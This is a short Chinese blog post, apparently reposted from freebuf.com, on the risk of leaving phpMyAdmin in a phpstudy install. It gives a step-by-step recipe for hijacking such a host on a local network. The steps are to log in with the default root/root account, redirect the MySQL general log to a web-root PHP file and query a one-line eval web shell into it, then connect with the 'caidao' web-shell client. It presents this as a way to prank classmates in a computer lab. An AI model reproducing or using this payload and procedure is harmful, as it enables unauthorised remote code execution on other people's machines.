论phpstudy不删除phpMyAdmin的危害 – 作者:Y2hlbmc

发现一个phpstudy比较好玩的漏洞,在机房可以捉弄一下小伙伴

Win7虚拟机:192.168.195.132

前提条件

与目标主机出在同一内网

使用phpstudy且没有删除phpMyAdmin文件
image.pngphpstudy装完之后会在根目录创建一个phpMyAdmin文件
image.png物理机访问一下phpMyAdmin文件
image.png用默认账号密码rootroot登进去
变量栏处找到general log,将它改成ON
general log file的地址改成E:\WWW\shell.php
image.pngSQL栏输入查询语句插入一句话木马

select '<?php eval($_REQUEST[x]);?>'

image.png成功之后就可以打开菜刀连接了
image.png

来源:freebuf.com 2021-04-24 23:13:32 by: Y2hlbmc

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论